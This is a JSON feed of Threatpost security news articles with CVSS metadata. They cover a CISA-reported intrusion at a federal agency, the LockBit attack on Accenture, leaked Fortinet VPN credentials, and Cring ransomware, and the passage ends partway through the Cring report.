"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:09:34", "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that it\u2019s intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. \u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "cvss3": {}, "published": "2020-09-24T20:47:40", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T13:06:12", "description": "081321 08:42 UPDATE: Accenture reportedly acknowledged in an internal memo that attackers stole client information and work materials in a July 30 \u201csecurity incident.\u201d\n\n[CyberScoop](<https://www.cyberscoop.com/accenture-ransomware-lockbit/>) reports that the memo downplays the impact of the ransomware attack. The outlet quoted Accenture\u2019s internal memo: \u201cWhile the perpetrators were able to acquire certain documents that reference a small number of clients and certain work materials we had prepared for clients, none of the information is of a highly sensitive nature,\u201d it reads. Threatpost has asked Accenture to comment on CyberScoop\u2019s report.\n\nEarlier this week, the LockBit ransomware-as-a-service (RaaS) gang published the name and logo of what has now been confirmed as one of its latest victims: Accenture, a global business consulting firm with an insider track on some of the world\u2019s biggest, most powerful companies.\n\nAccenture\u2019s clients include 91 of the Fortune Global 100 and more than three-quarters of the Fortune Global 500. According to its [2020 annual report;](<https://www.accenture.com/us-en/about/company/annual-report>) that includes e-commerce giant Alibaba, Cisco and Google. Valued at $44.3 billion, Accenture is one of the world\u2019s largest tech consultancy firms, and employs around 569,000 people across 50 countries.\n\nIn a post on its Dark Web site, LockBit offered up Accenture databases for sale, along with a requisite jab at what the gang deemed to be Accenture\u2019s pathetic security.\n\n> \u201cThese people are beyond privacy and security. I really hope that their services are better than what I saw as an insider. If you are interested in buying some databases, reach us.\u201d \n\u2014LockBit site post.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11162046/LockBit-site-screengrab.png>)\n\nLockBit dark-web site screen capture. Source: Cybereason.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to [Security Affairs](<https://securityaffairs.co/wordpress/121048/data-breach/accenture-lockbit-2-0-ransomware-attack.html?utm_source=rss&utm_medium=rss&utm_campaign=accenture-lockbit-2-0-ransomware-attack>), at the end of a ransom payment clock\u2019s countdown, a leak site showed a folder named W1 that contained a collection of PDF documents allegedly stolen from the company. LockBit operators claimed to have gained access to Accenture\u2019s network and were preparing to leak files stolen from Accenture\u2019s servers at 17:30:00 GMT.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/11174155/countdown-clock-e1628718131517.png>)\n\nLockBit countdown clock. Source: Cyble.\n\nThe news hit the headlines late Wednesday morning Eastern Time, after CNBC reporter Eamon Javers [tweeted](<https://twitter.com/EamonJavers/status/1425476619934838785>) about the gang\u2019s claim that it would be releasing data within coming hours and that it was offering to sell insider Accenture information to interested parties.\n\n> A hacker group using Lockbit Ransomware says they have hacked the consulting firm Accenture and will release data in several hours, CNBC has learned. They are also offering to sell insider Accenture information to interested parties.\n> \n> \u2014 Eamon Javers (@EamonJavers) [August 11, 2021](<https://twitter.com/EamonJavers/status/1425476619934838785?ref_src=twsrc%5Etfw>)\n\n## Blessed Be the Backups\n\nYes, we were hit, but we\u2019re A-OK now, Accenture confirmed: \u201cThrough our security controls and protocols, we identified irregular activity in one of our environments. We immediately contained the matter and isolated the affected servers,\u201d it said in a statement. \u201cWe fully restored our affected systems from backup, and there was no impact on Accenture\u2019s operations, or on our clients\u2019 systems.\u201d\n\nAccording to [BleepingComputer](<https://www.bleepingcomputer.com/news/security/accenture-confirms-hack-after-lockbit-ransomware-data-leak-threats/>), the group that threatened to publish Accenture\u2019s data \u2013 allegedly stolen during a recent cyberattack \u2013 is known as LockBit 2.0.\n\nAs explained by Cybereason\u2019s Tony Bradley in a Wednesday [post](<https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware>), the LockBit gang is similar to its ransomware-as-a-service (RaaS) brethren DarkSide and REvil: Like those other operations. LockBit uses an affiliate model to rent out its ransomware platform, taking a cut of any ransom payments that result.\n\nBradley noted that the LockBit gang is apparently on a hiring spree in the wake of [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [REvil](<https://threatpost.com/whats-next-revil-victims/167926/>) both shutting down operations.\n\n\u201cThe wallpaper displayed on compromised systems now includes text inviting insiders to help compromise systems \u2013 promising payouts of millions of dollars,\u201d Bradley wrote.\n\n## Insider Job?\n\nCyble researchers suggested in a [Tweet stream](<https://twitter.com/AuCyble/status/1425422006690881541>) that this could be an insider job. \u201cWe know #LockBit #threatactor has been hiring corporate employees to gain access to their targets\u2019 networks,\u201d the firm tweeted, along with a clock counting down how much time was left for Accenture to cough up the ransom.\n\n> Potential insider job? We know [#LockBit](<https://twitter.com/hashtag/LockBit?src=hash&ref_src=twsrc%5Etfw>) [#threatactor](<https://twitter.com/hashtag/threatactor?src=hash&ref_src=twsrc%5Etfw>) has been hiring corporate employees to gain access to their targets' networks.[#ransomware](<https://twitter.com/hashtag/ransomware?src=hash&ref_src=twsrc%5Etfw>) [#cyber](<https://twitter.com/hashtag/cyber?src=hash&ref_src=twsrc%5Etfw>) [#cybersecurity](<https://twitter.com/hashtag/cybersecurity?src=hash&ref_src=twsrc%5Etfw>) [#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) [#accenture](<https://twitter.com/hashtag/accenture?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/ZierqRVIjj](<https://t.co/ZierqRVIjj>)\n> \n> \u2014 Cyble (@AuCyble) [August 11, 2021](<https://twitter.com/AuCyble/status/1425391442248097792?ref_src=twsrc%5Etfw>)\n\nCyble said that LockBit claimed to have made off with databases of more than 6TB and that it demanded $50 million as ransom. The threat actors themselves alleged that this was an insider job, \u201cby someone who is still employed there,\u201d though Cyble called that \u201cunlikely.\u201d\n\nSources familiar with the attack told BleepingComputer that Accenture confirmed the ransomware attack to at least one computer telephony integration (CTI) vendor and that it\u2019s in the process of notifying more customers. According to a [tweet](<https://twitter.com/HRock/status/1425447533598453760?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1425447533598453760%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fsecurity%2Faccenture-confirms-hack-after-lockbit-ransomware-data-leak-threats%2F>) from threat intelligence firm Hudson Rock, the attack compromised 2,500 computers used by employees and partners, leading the firm to suggest that \u201cthis information was certainly used by threat actors.\u201d\n\nIn a [security alert ](<https://www.cyber.gov.au/acsc/view-all-content/alerts/lockbit-20-ransomware-incidents-australia>)issued last week, the Australian Cyber Security Centre (ACSC) warned that LockBit 2.0 ransomware attacks against Australian organizations had started to rise last month, and that they were coupled with threats to publish data in what\u2019s known as [double-extortion attacks](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>).\n\n\u201cThis activity has occurred across multiple industry sectors,\u201d according to the alert. \u201cVictims have received demands for ransom payments. In addition to the encryption of data, victims have received threats that data stolen during the incidents will be published.\u201d\n\nThe ACSC noted ([PDF](<https://www.cyber.gov.au/sites/default/files/2021-08/2021-006%20ACSC%20Ransomware%20Profile%20-%20Lockbit%202.0.pdf>)) that it\u2019s recently observed LockBit threat actors actively exploiting existing vulnerabilities in the Fortinet FortiOS and FortiProxy products, identified as CVE-2018-13379, in order to gain initial access to specific victim networks. That vulnerability, a path-traversal flaw in the SSL VPN, has been exploited in multiple attacks over the years:\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that advanced persistent threat (APT) nation-state actors were actively exploiting it to gain a foothold within networks before moving laterally and carrying out recon, for example.\n\n## Known Vulnerability Exploited?\n\nRon Bradley, vice president of third-party risk-management firm Shared Assessments, told Threatpost on Wednesday that the Accenture incident is \u201ca prime example of the difference between business resiliency and business continuity. Business resiliency is like being in a boxing match, you take a body blow but can continue the fight. Business continuity comes into play when operations have ceased or severely impaired and you have to make major efforts to recover.\n\n\u201cThis particular example with Accenture is interesting in the fact that it was a known/published vulnerability,\u201d Bradley continued. It highlights the importance of making sure systems are properly patched in a timely manner. The ability for Accenture to manage the repercussions of potentially stolen data will be an important lesson for many organizations going forward.\u201d\n\nHitesh Sheth, president and CEO at the cybersecurity firm Vectra, said that all businesses should expect attacks like this, but particularly a global consultancy firm with links to so many companies.\n\n\u201cFirst reports suggest Accenture had data backup protocols in place and moved quickly to isolate affected servers,\u201d he told Threatpost on Wednesday. \u201cIt\u2019s too soon for an outside observer to assess damage. However, this is yet another reminder to businesses to scrutinize security standards at their vendors, partners, and providers. Every enterprise should expect attacks like this \u2013 perhaps especially a global consulting firm with links to so many other companies. It\u2019s how you anticipate, plan for and recover from attacks that counts.\u201d\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T21:56:00", "type": "threatpost", "title": "Accenture Confirms LockBit Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-08-11T21:56:00", "id": "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "href": "https://threatpost.com/accenture-lockbit-ransomware-attack/168594/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-10T13:33:05", "description": "Credentials pilfered from 87,000 unpatched Fortinet SSL-VPNs have been posted online, the company has [confirmed](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>).\n\nOr then again, maybe the number is far greater. On Wednesday, [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-leak-passwords-for-500-000-fortinet-vpn-accounts/>) reported that it\u2019s been in touch with a threat actor who leaked a list of nearly half a million Fortinet VPN credentials, allegedly scraped from exploitable devices last summer.\n\nThe news outlet has analyzed the file and reported that it contains VPN credentials for 498,908 users over 12,856 devices. BleepingComputer didn\u2019t test the credentials but said that all of the IP addresses check out as Fortinet VPN servers.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAccording to analysis done by [Advanced Intel](<https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings>), the IP addresses are for devices worldwide. As the chart below shows, there are 22,500 victimized entities located in 74 countries, with 2,959 of them being located in the US.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09180501/distribution-e1631225115765.jpg>)\n\nThe geographical distribution of the Fortinet VPN SSL list. Source: Advanced Intel.\n\nUPDATE: Threatpost reached out to Fortinet for clarification on how many devices were compromised. A spokesperson\u2019s reply reiterated the statement put out on Wednesday:\n\n\u201cThe security of our customers is our first priority. Fortinet is aware that a malicious actor has disclosed on a dark web forum, SSL-VPN credentials to access FortiGate SSL-VPN devices. The credentials were obtained from systems that have not yet implemented the patch update provided in May 2019. Since May 2019, Fortinet has continuously communicated with customers urging the implementation of mitigations, including corporate blog posts in [August 2019](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_fortios-2Dssl-2Dvulnerability&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=LGgVh3l8kre7r4f1ssl1_Kz9MXkRjaAznfUi1BMjzpc&e=>), [July 2020](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_business-2Dand-2Dtechnology_atp-2D29-2Dtargets-2Dssl-2Dvpn-2Dflaws&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=F9W4tauf4zFHFuZbvTYHmF2Y2b_tHI0htVTpiF6kRwM&e=>), [April 2021](<https://urldefense.proofpoint.com/v2/url?u=https-3A__www.fortinet.com_blog_psirt-2Dblogs_patch-2Dvulnerability-2Dmanagement&d=DwMGaQ&c=tEbGsWWjqkBSpaWdXc_mdMSanI1bDu-FKXiKGCfVmPM&r=ci047yKZbNETIRLbYhPR9hvS9MgdS6HahLetj-MiY5k&m=S-tLJEaNHed7zOH8JaLd3mVoBNXqYMeUqJMrJaXLE9s&s=m_k7PDQ0L4L0_OvdKQgGF5LkRVde6Q9EjgVXWtyg7sY&e=>) and [June 2021](<https://www.fortinet.com/blog/psirt-blogs/prioritizing-patching-is-essential-for-network-integrity>) For more information, please refer to our latest [blog](<https://www.fortinet.com/blog/psirt-blogs/malicious-actor-discloses-fortigate-ssl-vpn-credentials>) and [PSIRT](<https://www.fortiguard.com/psirt/FG-IR-18-384>) advisory. We strongly urge customers to implement both the patch upgrade and password reset as soon as possible.\u201d\n\n## A Creaky Old Bug Was Exploited\n\nOn Wednesday, the company confirmed that the attackers exploited [FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) / [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>): a path traversal weakness in Fortinet\u2019s FortiOS that was discovered in 2018 and which has been [repeatedly](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>), [persistently](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) [exploited](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) [since](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) then.\n\nUsing the leaked VPN credentials, attackers can perform data exfiltration, install malware and launch ransomware attacks.\n\nThe bug, which recently made it to the Cybersecurity and Infrastructure Security Agency\u2019s (CISA\u2019s) list of the [top 30 most-exploited flaws](<https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/>), lets an unauthenticated attacker use specially crafted HTTP resource requests in order to download system files under the SSL VPN web portal.\n\n[Fortinet fixed the glitch](<https://www.fortiguard.com/psirt/FG-IR-18-384>) in a May 2019 update (and has since then repeatedly urged customers to upgrade their devices to FortiOS 5.4.13, 5.6.14, 6.0.11, or 6.2.8 and above). But even if security teams patched their VPNs, if they didn\u2019t also reset the devices\u2019 passwords at the same time, the VPNs still might be vulnerable.\n\n## All in the Babuk Family\n\nAccording to BleepingComputer, a threat actor known as Orange \u2013 the administrator of the newly launched RAMP hacking forum and a previous operator of the Babuk ransomware operation \u2013 was behind the leak of Fortinet credentials.\n\nOrange, who reportedly split off from Babuk after gang members quarreled, is believed to now be in with the new Groove ransomware operation. On Tuesday, Orange created a post on the RAMP forum with a link to a file that allegedly contained thousands of Fortinet VPN accounts.\n\nAt the same time, a post promoting the Fortinet leak appeared on Groove\u2019s data leak site.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09181910/Screen-Shot-2021-09-09-at-6.18.51-PM-e1631225999483.png>)\n\nGroove is a new ransomware gang that\u2019s been active just since last month. It favors the [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>) model of combining data compromise with threats to publish seized data.\n\nAccording to a Wednesday[ post](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates>) co-authored by researchers from Intel471 and McAfee Enterprise Advanced Threat Research (ATR), with contributions from Coveware, McAfee Enterprise ATR said that it believes with high confidence that Groove is associated with the Babuk gang, either as a former affiliate or subgroup.\n\n## Chatting Up the Ransomware \u2018Artist\u2019\n\nOn Tuesday, one of the Groove gang\u2019s members decided to chat up [Advanced Intel researchers](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURfcd4v3FHxX6gbihrPKiOsKVZWKogo5F6F12wmaozsXKHpRn-2BuwOKhxsw08i8Jv-2FwvO5fMxaC-2Fte96Z6WZovyPDvgaoAv118tKwZ5rO8iwUDyyIWPDHnMoXBJtaLTD2RabFZrrydZEg6RqJoehkdLk-3DUm1f_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfxpBYaCF7SSTgcHUKKV76UPqxTA0p35WcvHO-2B-2FRJuzuH54khmPYQLlkSfPjUHNAEXmgG-2BAfkNgcNKoVR9B9stOpafLCBk3qkXifeCsD9qirBA0nFvpW7EKJZBqmyDuRJPZiat-2B-2BXYCIJyRqjlbli1cMzNiEtsWjfRjsB82fJ-2BuXkMJGLitr0yTHVhHoV-2B7vgARde73QCuABoV-2Fk8lDDaGpEQVoKiwlCAiZTq63zy5kUQ-3D>), to give them an insider\u2019s take on how the new ransomware syndicate was formed and how it recruits operators. That included \u201cthe \u2018truth\u2019 about the association of Babuk, [DarkSide](<https://threatpost.com/darksides-servers-shutdown/166187/>) and [BlackMatter](<https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/>), and other insights on the inner relationships within the ransomware community,\u201d as researchers Yelisey Boguslavskiy and Anastasia Sentsova explained.\n\nAccording to their writeup, the Groove representative is likely a threat actor that goes by \u201cSongBird\u201d. The researchers described SongBird as a known character, being a former Babuk ransomware operator and creator of the RAMP forum \u2013 which was launched on July 11 and which caters to top ransomware operators plotting their attacks.\n\nThe screen capture below shows Advanced Intel\u2019s translation of SongBird\u2019s explanation of the platform: \u201cRAMP is the result of my year-long work of manipulation by top journalists and media such as Bloomberg and others. I spent quite some time to promote this domain and I am very proud for all of the work I did! I declare this forum is a work of art!\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/09183430/kitten-brag-e1631226887669.jpg>)\n\nAccording to Advanced Intel, RAMP was initially based on the former Babuk\u2019s data leak website domain but has since relocated to a new domain.\n\nSongBird was reportedly prompted to pull off their tell-all after the [disclosure of Babuk\u2019s source code](<https://threatpost.com/babuk-ransomware-builder-virustotal/167481/>). The source code was uploaded to VirusTotal in July, making it available to all security vendors and competitors. At the time, it wasn\u2019t clear how it happened, though Advanced Intel said on Wednesday that the code release was done by an actor using the alias DY-2.\n\nThe code release had repercussions, Advanced Intel said. \u201cThe incident caused a massive backlash from the underground community which once again provoked the release of the blog by SongBird,\u201d according to the report.\n\nSongBird told the researchers that the actor wanted to address \u201cthe issue of constant misinformation and misreporting originating from the Twitter community covering the ransomware subject.\u201d\n\nThe actor denied any associations between DarkSide and BlackMatter, with the exception of both ransomware strains sharing the same source code: a circumstance that means the code \u201cmost likely has been purchased from one of the DarkSide affiliates,\u201d SongBird wrote.\n\n## How to Protect Your VPN\n\nYou can check Fortinet\u2019s advisory for a list of versions affected by the oft-exploited vulnerability that was at the heart of this credential scraping. Fortinet had the following recommendations for organizations that may have been running an affected version \u201cat any time\u201d:\n\n 1. Disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken.\n 2. Immediately upgrade affected devices to the latest available release, as detailed below.\n 3. Treat all credentials as potentially compromised by performing an organization-wide password reset.\n 4. Implement multi-factor authentication, which will help mitigate the abuse of any compromised credentials, both now and in the future.\n 5. Notify users to explain the reason for the password reset and monitor services such as HIBP for your domain. There is the potential that if passwords have been reused for other accounts, they could be used in credential stuffing attacks.\n\nRajiv Pimplaskar, Veridium chief revenue officer, told Threatpost that the breach is \u201ca stark reminder of today\u2019s dangers with password-based systems. While enterprises and users are starting to adopt passwordless authentication methods like \u2018phone as a token\u2019 and FIDO2 for customer and Single Sign On (SSO) portals and enterprise applications, vulnerabilities still exist across entire categories of cases such as, 3rd party sites, VPN (Virtual Private Network) and VDI (Virtual Desktop Infrastructure) environments, all of which are particularly vulnerable in the current WFH explosion.\n\n\u201cCompanies need to adopt a more holistic modern authentication strategy that is identity provider agnostic and can operate across all use cases in order to build true resiliency and ensure cyber defense against such actors,\u201d he concluded.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T22:49:27", "type": "threatpost", "title": "Thousands of Fortinet VPN Account Credentials Leaked", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-09-09T22:49:27", "id": "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "href": "https://threatpost.com/thousands-of-fortinet-vpn-account-credentials-leaked/169348/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-08T21:27:05", "description": "Threat actors are exploiting a Fortinet vulnerability flagged by the feds last week that delivers a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\nResearchers say the attackers are exploiting an unpatched path-reversal flaw, tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>), in Fortinet\u2019s FortiOS. The goal is to gain access to victims enterprise networks and ultimately deliver ransomware, according to a [report by Kaspersky researchers published](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) this week.\n\n\u201cIn at least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted,\u201d Kaspersky senior security researcher Vyacheslav Kopeytsev wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nCring is relatively new to the ransomware threat landscape\u2014which already includes dominant strains [REvil](<https://threatpost.com/revil-claims-ransomware-attacks/164739/>), [Ryuk](<https://threatpost.com/ransomware-attack-spain-employment-agency/164703/>), [Maze and](<https://threatpost.com/maze-ransomware-cognizant/154957/>) 